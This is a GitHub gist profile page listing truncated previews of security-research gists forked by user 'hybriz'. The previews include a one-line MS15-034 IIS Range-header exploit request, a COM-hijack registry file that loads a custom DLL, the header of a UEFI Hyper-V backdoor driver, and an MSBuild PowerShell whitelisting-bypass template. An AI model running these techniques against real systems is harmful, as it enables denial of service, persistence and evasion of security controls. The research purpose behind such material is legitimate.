I hereby claim:
- I am hybriz on github.
- I am hybriz (https://keybase.io/hybriz) on keybase.
- I have a public key whose fingerprint is B551 1C31 3D1C 7273 7597 A18C 2A56 BF63 EBCF 54E8
To claim this, I am signing this object:
hybriz
hybriz
/ keybase.md
Created
April 10, 2024 10:31
hybriz
/ clone-all-twitter-github-repos.sh
Created
November 25, 2017 19:16
— forked from caniszczyk/clone-all-twitter-github-repos.sh
Clone all repos from a GitHub organization
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -s https://api.github.com/orgs/twitter/repos?per_page=200 | ruby -rubygems -e 'require "json"; JSON.load(STDIN.read).each { |repo| %x[git clone #{repo["ssh_url"]} ]}' |
hybriz
/ com_hijack.reg
Created
November 3, 2017 12:50
— forked from NickTyrer/com_hijack.reg
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}] | |
| [HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}\InProcServer32] | |
| @="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll" |
hybriz
/ scriptlet.md
Created
November 3, 2017 12:50
— forked from cure53/scriptlet.md
The Scriptless Scriptlet - Or how to execute JavaScript from CSS in MSIE11 without using Scripts
hybriz
/ dg.ps1
Created
November 3, 2017 12:48
— forked from darkoperator/dg.ps1
Device Guard Configuration
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $s1 = (gwmi -List Win32_ShadowCopy).Create("C:\", "ClientAccessible") | |
| $s2 = gwmi Win32_ShadowCopy | ? { $_.ID -eq $s1.ShadowID } | |
| $d = $s2.DeviceObject + "\" | |
| cmd /c mklink /d C:\scpy "$d" | |
| New-CIPolicy -Level RootCertificate -FilePath C:\BasePolicy.xml -ScanPath C:\scpy -UserPEs | |
| $s2.Delete() | |
| Remove-Item -Path C:\scpy -Force | |
| Set-RuleOption –option 3 –FilePath C:\BasePolicy.xml | |
| ConvertFrom-CIPolicy C:\BasePolicy.xml C:\BasePolicy.bin | |
| Move-Item C:\BasePolicy.bin c:\Windows\System32\CodeIntegrity\SIPolicy.p7b -force |
hybriz
/ ms15-034.cmd
Created
November 3, 2017 12:47
— forked from obscuresec/ms15-034.cmd
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell -com {$wr=[Net.WebRequest]::Create('http://127.0.0.1/iisstart.htm');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()} |
hybriz
/ rpn-jit.c
Created
November 3, 2017 12:42
— forked from anonymous/rpn-jit.c
RPN JIT Compiler
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* http://redd.it/2zna5q | |
| * Fibonacci example: | |
| * (1) (2) + | |
| * 0:0 | |
| * 1:1 | |
| * 20 | |
| */ | |
| #define _BSD_SOURCE // MAP_ANONYMOUS | |
| #include <stdio.h> | |
| #include <stdlib.h> |
hybriz
/ DmaHvBackdoor.c
Created
November 3, 2017 12:41
— forked from Cr4sh/DmaHvBackdoor.c
Hyper-V backdoor for UEFI
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| ********************************************************************* | |
| Part of UEFI DXE driver code that injects Hyper-V VM exit handler | |
| backdoor into the Device Guard enabled Windows 10 Enterprise. | |
| Execution starts from new_ExitBootServices() -- a hook handler | |
| for EFI_BOOT_SERVICES.ExitBootServices() which being called by | |
| winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi | |
| transfers exeution to previously loaded Hyper-V kernel (hvix64.sys) |
hybriz
/ LoadMethodScanner.ps1
Created
November 3, 2017 12:39
— forked from mattifestation/LoadMethodScanner.ps1
A crude Load(byte[]) method scanner for UMCI bypass research
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author: Matthew Graeber (@mattifestation) | |
| # Load dnlib with Add-Type first | |
| # dnlib can be obtained here: https://github.com/0xd4d/dnlib | |
| # Example: ls C:\ -Recurse | Get-AssemblyLoadReference | |
| filter Get-AssemblyLoadReference { | |
| param ( | |
| [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] | |
| [Alias('FullName')] | |
| [String] | |
| [ValidateNotNullOrEmpty()] |
hybriz
/ pshell_template_embedded_script.xml
Created
November 3, 2017 12:38
— forked from xorrior/pshell_template_embedded_script.xml
MSBuild Powershell Script XML template
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml --> | |
| <!-- Author: Casey Smith, Twitter: @subTee --> | |
| <!-- License: BSD 3-Clause --> | |
| <PropertyGroup> | |
| <FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName> | |
| <Cmd Condition="'$(Cmd)' == ''">None</Cmd> | |
| </PropertyGroup> | |
| <Target Name="Hello"> |
NewerOlder